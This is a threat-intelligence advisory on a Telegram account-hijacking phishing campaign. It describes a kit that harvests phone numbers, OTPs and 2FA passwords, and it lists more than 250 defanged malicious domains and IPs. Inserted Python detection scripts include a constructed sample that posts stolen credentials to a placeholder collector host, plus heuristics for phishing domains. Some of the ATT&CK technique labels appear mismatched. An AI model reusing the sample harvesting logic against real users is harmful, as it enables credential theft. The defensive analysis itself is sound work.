Mass Telegram account hijacking via supply-chain phishing campaign

November 11, 2024

iZOOlogic Red Team has uncovered a recent malicious phishing campaign targeting Telegram users on a large scale. This attack involves the use of phishing links disguised as Telegram login pages, aimed at harvesting user credentials such as mobile number, OTPs, and 2FA passwords.

The threat actor behind this campaign is identified as “Tai Tsi,” based on the WHOIS registration details, with all flagged domains originating from Hong Kong, China.

During the research, we found more than 200 similar phishing domains registered under the .top TLD. The campaign aims to compromise user accounts in a supply-chain fashion: each hijacked account is used to propagate the malicious links further.

Modus Operandi

  1. Phishing Link Distribution
    • The attacker sends the victim an initial phishing message containing a link that appears to come from Telegram. The message may say, “There are your photos and videos in it: http[:]//lbvamvemkxfi[.]top/login”.
    • The link directs the victim to a fake Telegram login page designed to steal credentials, OTPs, and passwords.
  2. Credential Harvesting
    • Once the victim enters their credentials, they are harvested by the attacker in real time.
    • The attacker immediately uses the stolen credentials to hijack the victim’s Telegram account.
  3. Account Takeover
    • The attacker then sends a similar phishing message from the compromised account to the victim’s entire contact list.
    • The cycle repeats, leading to a massive chain of compromised accounts across Telegram.
  4. Further Abuse
    • In some cases, the attackers might use the compromised accounts to spread malware, request sensitive information from contacts, or impersonate the victim for financial fraud.

Source Code Analysis

  1. Input Validation and Phone Number Formatting
    • The code includes logic for validating and formatting phone numbers based on country-specific patterns. This enhances the legitimacy of the phishing page by ensuring that users enter valid numbers, increasing the success rate of data collection.
    • Countries such as India (IN), USA (US), and Canada (CA) are specifically targeted, though the list can easily be expanded to include more countries.
  2. AJAX Request for Data Collection
    • The phishing script captures the phone number, OTP, and 2FA password and sends them to the attacker’s server using an AJAX POST request.
  3. Local Storage for Tracking
    • The phone number and a unique identifier (UUID) are stored in the browser’s localStorage, which lets the kit track the user’s activity on the phishing page. Once the user has submitted the sensitive credentials (OTP and password), they are redirected to a pornography site. The values held in localStorage and cookies are used to recognise a returning user, who is then redirected straight to the hardcoded pornography domain again.
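The traits listed above can be turned into a triage check for a captured page. The following Python script is an added example, not code from the advisory or from the phishing kit: given a page's hostname and its inline JavaScript, it flags a single POST that carries phone, OTP and 2FA password together, localStorage keys used to recognise the visitor (uuid, phone), and a hardcoded redirect to a third-party domain. The two scripts it runs on are constructed samples with placeholder hostnames under .invalid; it assumes the page's own hostname is known from the capture.

```python
"""Score a captured login page's script for the kit traits described above.

Added example, not code from the advisory or from the phishing kit. Given
the page's hostname and its inline JavaScript, it looks for three of the
traits the analysis lists: a single POST carrying phone, OTP and password,
localStorage keys used to track the visitor (uuid, phone), and a hardcoded
redirect to a third-party domain. The two scripts below are constructed
samples; hostnames ending in .invalid are placeholders.
"""
import re
from urllib.parse import urlparse

CREDENTIAL_FIELDS = ("phone", "otp", "password")

# url: '...', $.post('...', fetch('...'  ->  the submission endpoint
ENDPOINT_RE = re.compile(r"""(?:\burl\s*:\s*|\$\.post\(\s*|\bfetch\(\s*)["']([^"'\s]+)["']""")
POST_RE = re.compile(r"""(?i)(?:type|method)\s*:\s*["']post["']|\$\.post\(""")
LOCALSTORAGE_RE = re.compile(r"""localStorage\.setItem\(\s*["'](\w+)["']""")
REDIRECT_RE = re.compile(
    r"""(?:location(?:\.href)?\s*=|location\.(?:assign|replace)\()\s*["'](https?://[^"'\s]+)["']"""
)


def external_host(url, page_host):
    """Hostname of an absolute URL if it differs from the page's own host, else None."""
    host = urlparse(url).hostname
    return host if host and host.lower() != page_host.lower() else None


def fingerprint(page_host, script):
    """Return human-readable findings, one per kit trait present in the script."""
    findings = []
    lowered = script.lower()

    # Trait 1: phone + OTP + 2FA password submitted together via an AJAX/fetch POST.
    if all(field in lowered for field in CREDENTIAL_FIELDS) and POST_RE.search(script):
        endpoints = sorted(set(ENDPOINT_RE.findall(script)))
        findings.append("phone/OTP/password posted together to: " + ", ".join(endpoints or ["<unresolved>"]))

    # Trait 2: localStorage used to recognise the visitor on return.
    stored = {key.lower() for key in LOCALSTORAGE_RE.findall(script)}
    if stored & {"uuid", "phone"}:
        findings.append("visitor tracking in localStorage: " + ", ".join(sorted(stored)))

    # Trait 3: hardcoded redirect off the page's origin after submission.
    redirects = sorted({h for h in (external_host(u, page_host) for u in REDIRECT_RE.findall(script)) if h})
    if redirects:
        findings.append("hardcoded redirect to external host(s): " + ", ".join(redirects))

    return findings


def assess(page_host, script):
    """Verdict plus findings; two or more traits is treated as a likely harvesting page."""
    findings = fingerprint(page_host, script)
    verdict = "likely credential-harvesting page" if len(findings) >= 2 else "no kit traits found"
    return verdict, findings


# Constructed sample: the shape of the traits described in the analysis, placeholder hosts.
SUSPICIOUS_SCRIPT = """
var uuid = localStorage.getItem('uuid') || crypto.randomUUID();
localStorage.setItem('uuid', uuid);
localStorage.setItem('phone', phone);
$.ajax({type: 'POST', url: 'https://collector.placeholder.invalid/submit',
        data: {phone: phone, otp: otp, password: pwd, uuid: uuid}});
window.location.href = 'https://redirect.placeholder.invalid/';
"""

# Constructed sample: an ordinary same-origin login form.
BENIGN_SCRIPT = """
fetch('/api/login', {method: 'POST', body: JSON.stringify({phone: phone, code: code})});
window.location.href = '/home';
"""

if __name__ == "__main__":
    for name, host, script in [("suspicious", "login.placeholder.invalid", SUSPICIOUS_SCRIPT),
                               ("benign", "example.org", BENIGN_SCRIPT)]:
        verdict, findings = assess(host, script)
        print(f"{name}: {verdict}")
        for finding in findings:
            print("  -", finding)
```

The threshold of two traits is deliberate: a same-origin POST of a phone number and code is what a legitimate login does, so no single trait is treated as conclusive; it is the combination of off-origin submission, visitor tracking and a hardcoded external redirect that matches the kit described here.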

Tactics, Techniques, and Procedures (TTPs)

  • T1071.001: Phishing via Telegram Messaging Service.
  • T1204.003: User Execution – Compelling users to interact with a malicious link or message.
  • T1566.002: Phishing – Use of a fraudulent Telegram login page to steal credentials.
  • T1078: Valid Accounts – Using harvested credentials to access and control the victim’s Telegram account.
  • T1090: Proxy – Using compromised accounts to propagate the phishing link and impersonate the victim.

Mitigation and Recommendations

  1. User Awareness and Training
    • Users should be educated about the risks of phishing attacks and how to recognize suspicious messages.
    • Always verify the legitimacy of unsolicited links, even when they come from known contacts.
  2. Two-Factor Authentication (2FA)
    • Enforce the use of 2FA on Telegram accounts to add an additional layer of security.
  3. Credential Hygiene
    • Encourage users to avoid sharing OTPs, passwords, or login credentials through Telegram or any untrusted platform.
    • Regularly monitor account activity for unauthorized logins.
  4. Incident Response
    • If an account is compromised, users should immediately log out of all sessions, reset passwords, and notify contacts about the compromise.
  5. Avoid Clicking on Malicious Domains
    • Avoid clicking on malicious random-character domains such as http[:]//lbvamvemkxfi[.]top.
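As an added example that is not part of the advisory, the Python script below covers both the lure described under Phishing Link Distribution and the random-character domains warned about here: it refangs and extracts hostnames from message text, matches them against a subset of the domains in the Annexure, and applies two heuristics derived from that list (random-looking 9-12 letter labels under .top, and the keyword-plus-random-suffix families such as moneylion*, unlock* and recovery-*). The messages it scans are constructed samples; the first mirrors the lure quoted above.

```python
"""Triage Telegram-style message text for links to the campaign's domains.

Added example, not part of the iZOOlogic advisory or the phishing kit. It
refangs defanged text, extracts hostnames, matches them against a subset
of the advisory's IoC list and applies heuristics derived from that list:
random-looking 9-12 letter labels under .top, and the keyword-plus-random-
suffix families (moneylion*, unlock*, recovery-*, ...). Messages below are
constructed sample input; the first mirrors the lure quoted in the advisory.
"""
import re

# Subset of the indicators in the advisory's annexure (listed there as host[.]top).
KNOWN_BAD_DOMAINS = {
    "lbvamvemkxfi.top", "delqggdxkdyp.top", "moneylionwvh.top",
    "unlockfir.top", "recovery-wss.top", "regulation-lfu.top", "zd977.icu",
}

# Naming families seen across the IoC list: a keyword followed by a short random suffix.
FAMILY_RE = re.compile(r"^(moneylion|varomoney|unlock|locking|recoup|coercion)[a-z]{2,3}$")
HYPHEN_FAMILY_RE = re.compile(r"^(recovery|regulation|source)-[a-z0-9]{2,3}$")

# Optional scheme, then a dotted hostname ending in a TLD, then an optional path.
URL_RE = re.compile(r"(?i)\b(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})(/[^\s\"']*)?")

VOWELS = set("aeiou")


def refang(text):
    """Undo the common [.] / [:] / hxxp defanging so URLs can be parsed."""
    return text.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def defang(host):
    """Render a hostname in the [.] style the advisory uses for IoCs."""
    return host.replace(".", "[.]")


def looks_random(label):
    """Heuristic for labels such as lbvamvemkxfi: 9-12 letters with few vowels
    or a long consonant run. Real words (telegramhelp, microsoft) pass."""
    if not (9 <= len(label) <= 12) or not label.isalpha():
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    longest_consonant_run = max(len(run) for run in re.split(r"[aeiou]", label))
    return vowel_ratio < 0.3 or longest_consonant_run >= 4


def classify_host(host):
    """Return the reasons a hostname is suspicious; an empty list means nothing flagged."""
    host = host.lower().rstrip(".")
    reasons = []
    if host in KNOWN_BAD_DOMAINS:
        reasons.append("listed in advisory IoCs")
    labels = host.split(".")
    if len(labels) >= 2 and labels[-1] == "top":
        sld = labels[-2]
        if looks_random(sld):
            reasons.append("random-looking label under .top")
        if FAMILY_RE.match(sld) or HYPHEN_FAMILY_RE.match(sld):
            reasons.append("campaign naming pattern (keyword + random suffix)")
    return reasons


def triage_message(text):
    """Map each flagged hostname in a message (defanged) to its list of reasons."""
    flagged = {}
    for match in URL_RE.finditer(refang(text)):
        host = match.group(1).lower()
        reasons = classify_host(host)
        if reasons:
            flagged[defang(host)] = reasons
    return flagged


SAMPLE_MESSAGES = [  # constructed sample input
    "There are your photos and videos in it: http://lbvamvemkxfi.top/login",
    "Your refund is ready, confirm here: https://recovery-wss.top/verify",
    "Unlock your bonus: hxxps://unlockzzz[.]top",
    "Meeting notes are on https://docs.example.org/notes and the wiki.",
]


def run_demo(messages=SAMPLE_MESSAGES):
    """Print a verdict per message and return {message: flagged_hosts}."""
    results = {}
    for msg in messages:
        flagged = triage_message(msg)
        results[msg] = flagged
        print(f"[{'PHISH' if flagged else 'clean'}] {msg}")
        for host, reasons in flagged.items():
            print(f"    {host}: {'; '.join(reasons)}")
    return results


if __name__ == "__main__":
    run_demo()
```

The exact-match set catches the domains already in the Annexure; the two heuristics are there for the next batch of registrations, which the list suggests will follow the same random-label or keyword-plus-suffix shape. Treat heuristic hits as leads for a block list, not as automatic verdicts.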

Conclusion

This phishing campaign demonstrates how threat actors can exploit human trust and social networks like Telegram to orchestrate large-scale supply chain compromises. Further, attackers can misuse compromised Telegram accounts to harvest sensitive data, including user chats, contacts, and private information, which can then be leveraged for more insidious attacks such as extortion, blackmail, or identity theft. The compromised accounts could also be used to spread additional phishing campaigns, malware, or disinformation, expanding the scope of the attack by targeting the victim’s contacts and further compromising other individuals or organizations in the victim’s network.

Annexure

Indicators of Compromise

Malicious IP Addresses

  1. 156[.]251[.]139[.]34
  2. 23[.]224[.]184[.]250

Malicious Domains

  1. delqggdxkdyp[.]top
  2. idkbsmvenxtm[.]top
  3. fnxyzihiendz[.]top
  4. seyyhnzqvgoy[.]top
  5. kmhxuymkzowe[.]top
  6. sqjusunzsiyl[.]top
  7. nihjodoqndmn[.]top
  8. edohaguylkjx[.]top
  9. gfsclmsdmqmp[.]top
  10. jubkcmkbsarb[.]top
  11. weqetutiohnh[.]top
  12. lbvamvemkxfi[.]top
  13. jlcxbrhtddxh[.]top
  14. nwhijnqbfawk[.]top
  15. lsywcgvmsooq[.]top
  16. recwrqhvpnpd[.]top
  17. npyyulqlqhjg[.]top
  18. typhzeowbjol[.]top
  19. auyqhalqjckc[.]top
  20. hhothofmznsb[.]top
  21. swcfukvqxmec[.]top
  22. xrroawddkcir[.]top
  23. rsfzdrtidyfn[.]top
  24. lpeqemxeprfh[.]top
  25. tqsqqzxnxycl[.]top
  26. uekkvnqqdohm[.]top
  27. glhqbtfkflef[.]top
  28. tpqszgbzlfmo[.]top
  29. liihqwkqqvxn[.]top
  30. yhiroybgtrkk[.]top
  31. zqqahpegkgyb[.]top
  32. wenllpismlaz[.]top
  33. nantylceonqb[.]top
  34. si3qqt4ur[.]top
  35. moneylioniqj[.]top
  36. moneylioneaa[.]top
  37. moneylionulc[.]top
  38. moneylionbqg[.]top
  39. moneylionplq[.]top
  40. moneylionlim[.]top
  41. moneylionpxl[.]top
  42. moneylionhbi[.]top
  43. moneylionfha[.]top
  44. moneylionwrq[.]top
  45. moneylionlpn[.]top
  46. moneylionjio[.]top
  47. moneylionixw[.]top
  48. moneylionlve[.]top
  49. moneylioncjj[.]top
  50. moneylionayy[.]top
  51. moneylionwtt[.]top
  52. moneylionrpw[.]top
  53. moneylionolu[.]top
  54. lockingnf[.]top
  55. moneylionwvh[.]top
  56. moneylionpus[.]top
  57. moneylionmxk[.]top
  58. lockingnk[.]top
  59. zd977[.]icu
  60. recoupwl[.]top
  61. recouphh[.]top
  62. xyh79[.]top
  63. moneylionqlr[.]top
  64. recoupqy[.]top
  65. lockingmb[.]top
  66. yhdgpxvqw[.]top
  67. xyh78[.]top
  68. xyk20[.]top
  69. varomoneyav[.]top
  70. varomoneyrh[.]top
  71. varomoneytf[.]top
  72. unlockdfx[.]top
  73. unlockfir[.]top
  74. unlockgun[.]top
  75. unlocklsr[.]top
  76. unlockolb[.]top
  77. unlockpge[.]top
  78. unlockccf[.]top
  79. unlockbvq[.]top
  80. unlockspq[.]top
  81. unlockfza[.]top
  82. unlockauh[.]top
  83. unlockfkm[.]top
  84. unlockgvw[.]top
  85. unlockfpq[.]top
  86. unlockhmj[.]top
  87. moneylionpuc[.]top
  88. moneylionrhu[.]top
  89. moneylionnpw[.]top
  90. moneylionvfe[.]top
  91. moneylionyqt[.]top
  92. moneylionruo[.]top
  93. moneylionhwc[.]top
  94. moneylionkug[.]top
  95. moneyliondpn[.]top
  96. lockinggs[.]top
  97. lockingxn[.]top
  98. lockingaq[.]top
  99. lockingvb[.]top
  100. lockingzj[.]top
  101. lockingvf[.]top
  102. coercionjl[.]top
  103. unlockebb[.]top
  104. varomoneyoz[.]top
  105. unlockbfw[.]top
  106. recouptob[.]top
  107. varomoneytp[.]top
  108. unlockppa[.]top
  109. varomoneyei[.]top
  110. unlockenr[.]top
  111. unlockork[.]top
  112. lockinglu[.]top
  113. lockingcz[.]top
  114. recoupoe[.]top
  115. unlockxgn[.]top
  116. unlocknbp[.]top
  117. varomoneypo[.]top
  118. unlockosr[.]top
  119. moneylionqbg[.]top
  120. varomoneybw[.]top
  121. varomoneydo[.]top
  122. unlockvkj[.]top
  123. unlockvev[.]top
  124. recoupjfa[.]top
  125. o7z1qf8mf[.]top
  126. of1zgcahn[.]top
  127. 82fkgjyai[.]top
  128. bubdhm5fg[.]top
  129. 793hd9hld[.]top
  130. th8qpavse[.]top
  131. 9ynuupnsv[.]top
  132. rqmzcylp8[.]top
  133. bwpr9yg7a[.]top
  134. xwo8z3fyu[.]top
  135. lzdhtgug3[.]top
  136. rq6ei353o[.]top
  137. ppihr8vtg[.]top
  138. durbjr235[.]top
  139. df4xsdnsx[.]top
  140. 55r34huk5[.]top
  141. 4gv3b5jwq[.]top
  142. wxp4xeegn[.]top
  143. xqkst6s5z[.]top
  144. 464vdervb[.]top
  145. cy2fjocax[.]top
  146. v79aoi8f9[.]top
  147. gfbv5qk7w[.]top
  148. fsyw8irri[.]top
  149. 99uebjdpa[.]top
  150. y14jmv91w[.]top
  151. v5pa8m6n7[.]top
  152. w61kxwap7[.]top
  153. 2l9pdrxvr[.]top
  154. qk4g5g1cp[.]top
  155. lockingfn[.]top
  156. regulation-lfu[.]top
  157. regulation-snh[.]top
  158. regulation-ima[.]top
  159. regulation-rec[.]top
  160. regulation-ibx[.]top
  161. lockingtc[.]top
  162. lockingsj[.]top
  163. regulation-com[.]top
  164. regulation-dly[.]top
  165. recovery-wss[.]top
  166. regulation-ylh[.]top
  167. regulation-mqe[.]top
  168. recovery-gim[.]top
  169. regulation-llr[.]top
  170. recovery-bcy[.]top
  171. recovery-pfi[.]top
  172. recovery-bbs[.]top
  173. regulation-hob[.]top
  174. recovery-jat[.]top
  175. recovery-ivh[.]top
  176. regulation-drx[.]top
  177. regulation-jyk[.]top
  178. regulation-kfg[.]top
  179. regulation-nbi[.]top
  180. regulation-dqs[.]top
  181. recovery-hxc[.]top
  182. regulation-ppl[.]top
  183. recovery-uwu[.]top
  184. recovery-nmw[.]top
  185. recovery-vwn[.]top
  186. source-y5q[.]top
  187. regulation-dsq[.]top
  188. regulation-hlf[.]top
  189. regulation-ihu[.]top
  190. recovery-xfm[.]top
  191. recovery-orc[.]top
  192. recovery-hrx[.]top
  193. recovery-itq[.]top
  194. recovery-jz[.]top
  195. recovery-pe[.]top
  196. recovery-xu[.]top
  197. recovery-qe[.]top
  198. recovery-yx[.]top
  199. recovery-un[.]top
  200. recovery-rq[.]top
  201. recovery-kc[.]top
  202. recovery-uh[.]top
  203. recovery-uk[.]top
  204. recovery-ow[.]top
  205. recovery-fo[.]top
  206. recovery-mg[.]top
  207. recovery-he[.]top
  208. recovery-ff[.]top
  209. recovery-ml[.]top
  210. recovery-dc[.]top
  211. recovery-ci[.]top
  212. recovery-ux[.]top
  213. recovery-qp[.]top
  214. recovery-dtf[.]top
  215. recovery-cr[.]top
  216. recovery-vb[.]top
  217. recovery-rjr[.]top
  218. recovery-gzo[.]top
  219. recovery-dlg[.]top
  220. recovery-qoa[.]top
  221. recovery-xhp[.]top
  222. recovery-drj[.]top
  223. recovery-yq[.]top
  224. recovery-mn[.]top
  225. recovery-wq[.]top
  226. recovery-pes[.]top
  227. recovery-mv[.]top
  228. recovery-kx[.]top
  229. recovery-ws[.]top
  230. recovery-wdx[.]top
  231. recovery-fqc[.]top
  232. recovery-ehu[.]top
  233. recovery-vpw[.]top
  234. recovery-wvo[.]top
  235. recovery-tu[.]top
  236. recovery-ecd[.]top
  237. moneylioncng[.]top
  238. unlockshg[.]top
  239. moneylionzwu[.]top
  240. unlocksov[.]top
  241. moneylioniyb[.]top
  242. unlocktsd[.]top
  243. recoupzwu[.]top
  244. unlockbyd[.]top
  245. recouprq[.]top
  246. recoupdz[.]top
  247. recoupfp[.]top
  248. unlockxtp[.]top
  249. recoupff[.]top
  250. lockingji[.]top
  251. xyh83[.]top